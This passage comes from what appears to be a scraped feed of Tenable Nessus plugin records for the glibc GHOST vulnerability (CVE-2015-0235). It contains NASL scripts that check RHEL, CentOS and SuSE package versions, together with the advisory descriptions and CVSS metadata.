reference:\"glibc-devel-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"glibc-headers-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"glibc-headers-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-static-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"glibc-utils-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"glibc-utils-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"nscd-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"nscd-2.17-55.el7_0.5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:26", "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. 
Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "CentOS 5 : glibc (CESA-2015:0090) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:glibc", "p-cpe:/a:centos:centos:glibc-common", "p-cpe:/a:centos:centos:glibc-devel", "p-cpe:/a:centos:centos:glibc-headers", "p-cpe:/a:centos:centos:glibc-utils", "p-cpe:/a:centos:centos:nscd", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2015-0090.NASL", "href": "https://www.tenable.com/plugins/nessus/81025", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0090 and \n# CentOS Errata and Security Advisory 2015:0090 
respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81025);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"RHSA\", value:\"2015:0090\");\n\n script_name(english:\"CentOS 5 : glibc (CESA-2015:0090) (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. 
(CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-January/020906.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?93e1c138\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-common-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-devel-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-headers-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-utils-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"nscd-2.5-123.el5_11.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:33", "description": "This update for glibc fixes the following security issue :\n\n - A vulnerability was found and fixed in the GNU C Library, specifically in the function gethostbyname(), that can lead to a local or remote buffer overflow.\n (bsc#913646). 
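Every rpm_check(release:..., reference:"glibc-2.12-1.149.el6_6.5") call in the OracleVM, Red Hat and CentOS plugins above, and the ver_compare() cutoff in the PAN-OS plugin, reduces to one decision: is the installed version-release older than the fixed reference under RPM's ordering rules? The block below is an added example, not code from this page or from Tenable, that reimplements RPM's rpmvercmp() segment algorithm in C (digit runs compared by value, letter runs lexically, digits beat letters, a tilde sorts before anything including end of string; the newer caret rule is left out) and applies it to name-version-release strings. The package strings are constructed for the example; it assumes input as printed by `rpm -q --qf '%{NAME}-%{VERSION}-%{RELEASE}\n' glibc` (no architecture suffix) and ignores the epoch, which none of the references on this page carry. The helper names (`rpm_vercmp`, `rpm_split_nvr`, `rpm_is_older_than`) are this example's own.

```c
/* Added example (not from the page or Tenable): RPM version ordering. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* rpmvercmp()-style comparison of two version or release strings.
 * Returns -1 if a < b, 0 if equal, 1 if a > b. */
int rpm_vercmp(const char *a, const char *b)
{
    if (strcmp(a, b) == 0) return 0;
    while (*a || *b) {
        /* separators ('.', '_', '-', ...) carry no ordering information */
        while (*a && !isalnum((unsigned char)*a) && *a != '~') a++;
        while (*b && !isalnum((unsigned char)*b) && *b != '~') b++;
        if (*a == '~' || *b == '~') {          /* tilde: pre-release, sorts first */
            if (*a != '~') return 1;
            if (*b != '~') return -1;
            a++; b++;
            continue;
        }
        if (!*a || !*b) break;
        const char *sa = a, *sb = b;
        int isnum = isdigit((unsigned char)*a);
        if (isnum) {
            while (isdigit((unsigned char)*sa)) sa++;
            while (isdigit((unsigned char)*sb)) sb++;
        } else {
            while (isalpha((unsigned char)*sa)) sa++;
            while (isalpha((unsigned char)*sb)) sb++;
        }
        if (sb == b) return isnum ? 1 : -1;    /* digit run beats letter run */
        size_t la = sa - a, lb = sb - b;
        if (isnum) {                           /* numeric: drop leading zeros, longer wins */
            while (la > 1 && *a == '0') { a++; la--; }
            while (lb > 1 && *b == '0') { b++; lb--; }
            if (la != lb) return la > lb ? 1 : -1;
        }
        size_t n = la < lb ? la : lb;
        int rc = memcmp(a, b, n);
        if (rc) return rc < 0 ? -1 : 1;
        if (la != lb) return la < lb ? -1 : 1;
        a = sa; b = sb;
    }
    if (!*a && !*b) return 0;
    return *a ? 1 : -1;                        /* the string with segments left is newer */
}

struct nvr { char name[128]; char version[64]; char release[64]; };

/* Split "name-version-release" at its last two dashes (names may contain
 * dashes, versions and releases may not). Returns 1 on success, 0 if malformed. */
int rpm_split_nvr(const char *pkg, struct nvr *out)
{
    const char *rel = strrchr(pkg, '-');
    if (!rel || rel == pkg) return 0;
    const char *ver = rel - 1;
    while (ver > pkg && *ver != '-') ver--;
    if (ver == pkg) return 0;
    size_t nlen = ver - pkg, vlen = rel - ver - 1, rlen = strlen(rel + 1);
    if (nlen >= sizeof out->name || vlen >= sizeof out->version ||
        rlen >= sizeof out->release) return 0;
    memcpy(out->name, pkg, nlen);         out->name[nlen] = '\0';
    memcpy(out->version, ver + 1, vlen);  out->version[vlen] = '\0';
    memcpy(out->release, rel + 1, rlen);  out->release[rlen] = '\0';
    return 1;
}

/* Mirror of the plugins' rpm_check(): 1 if `installed` is the same package
 * as `reference` and strictly older (fix missing), 0 if equal, newer or a
 * different package, -1 if either string cannot be parsed. */
int rpm_is_older_than(const char *installed, const char *reference)
{
    struct nvr i, r;
    if (!rpm_split_nvr(installed, &i) || !rpm_split_nvr(reference, &r)) return -1;
    if (strcmp(i.name, r.name) != 0) return 0;
    int c = rpm_vercmp(i.version, r.version);
    if (c == 0) c = rpm_vercmp(i.release, r.release);
    return c < 0;
}

int main(void)
{
    /* Constructed sample output of the rpm query named in the lead-in. */
    const char *ref = "glibc-2.12-1.149.el6_6.5";
    const char *hosts[] = { "glibc-2.12-1.149.el6_6.4",
                            "glibc-2.12-1.149.el6_6.5",
                            "glibc-2.12-1.166.el6_7.7" };
    for (size_t k = 0; k < sizeof hosts / sizeof hosts[0]; k++)
        printf("%-28s %s\n", hosts[k],
               rpm_is_older_than(hosts[k], ref) == 1 ? "older than fix" : "not affected");
    return 0;
}
```

The reason the plugins key every reference on the distribution release (RHEL6, RHEL7, CentOS-5, OVS3.3) shows up in the comparison itself: glibc-2.5-123.el5_11.1 is the fixed RHEL 5 package, yet against the RHEL 6 reference it compares as older, so a check that ignored the release would flag a patched RHEL 5 host. Epoch handling, which this example omits, matters for the same reason: an epoch bump makes a numerically smaller version sort newer.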
(CVE-2015-0235)", "cvss3": {}, "published": "2015-01-27T00:00:00", "type": "nessus", "title": "SuSE 11 Security Update : glibc (SAT Patch Numbers 10202,10204,10206)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:glibc", "p-cpe:/a:novell:suse_linux:11:glibc-32bit", "p-cpe:/a:novell:suse_linux:11:glibc-devel", "p-cpe:/a:novell:suse_linux:11:glibc-devel-32bit", "p-cpe:/a:novell:suse_linux:11:glibc-html", "p-cpe:/a:novell:suse_linux:11:glibc-i18ndata", "p-cpe:/a:novell:suse_linux:11:glibc-info", "p-cpe:/a:novell:suse_linux:11:glibc-locale", "p-cpe:/a:novell:suse_linux:11:glibc-locale-32bit", "p-cpe:/a:novell:suse_linux:11:glibc-profile", "p-cpe:/a:novell:suse_linux:11:glibc-profile-32bit", "p-cpe:/a:novell:suse_linux:11:nscd", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_GLIBC-150122.NASL", "href": "https://www.tenable.com/plugins/nessus/81039", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. 
The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81039);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"SuSE 11 Security Update : glibc (SAT Patch Numbers 10202,10204,10206)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for glibc fixes the following security issue :\n\n - A vulnerability was found and fixed in the GNU C\n Library, specifically in the function gethostbyname(),\n that can lead to a local or remote buffer overflow.\n (bsc#913646). 
(CVE-2015-0235)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=913646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0235.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"\nApply the correct SAT patch number for your operating system :\nSLES11 SP1: 10202\nSLES11 SP2: 10204\nSLED/SLES11 SP3: 10206\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:11:glibc-locale-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-profile-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\n# 11.1\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"glibc-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"glibc-devel-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"glibc-html-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"glibc-i18ndata-2.11.1-0.60.1\")) flag++;\nif 
(rpm_check(release:\"SLES11\", sp:1, reference:\"glibc-info-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"glibc-locale-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"glibc-profile-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"nscd-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"glibc-32bit-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"glibc-devel-32bit-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"glibc-locale-32bit-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"glibc-profile-32bit-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"glibc-32bit-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.11.1-0.60.1\")) flag++;\n\n# 11.2\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"glibc-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"glibc-devel-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"glibc-html-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"glibc-i18ndata-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"glibc-info-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"glibc-locale-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"glibc-profile-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, 
reference:\"nscd-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"s390x\", reference:\"glibc-32bit-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"s390x\", reference:\"glibc-devel-32bit-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"s390x\", reference:\"glibc-locale-32bit-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"s390x\", reference:\"glibc-profile-32bit-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"x86_64\", reference:\"glibc-32bit-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.11.3-17.45.55.5\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.11.3-17.45.55.5\")) flag++;\n\n# 11.3\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"glibc-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"glibc-devel-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"glibc-i18ndata-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"glibc-locale-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"nscd-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i686\", reference:\"glibc-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i686\", reference:\"glibc-devel-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", 
reference:\"glibc-devel-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-i18ndata-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-locale-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"nscd-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-devel-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-html-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-i18ndata-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-info-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-locale-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-profile-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"nscd-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"glibc-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"glibc-devel-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"glibc-locale-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"glibc-profile-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"glibc-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", 
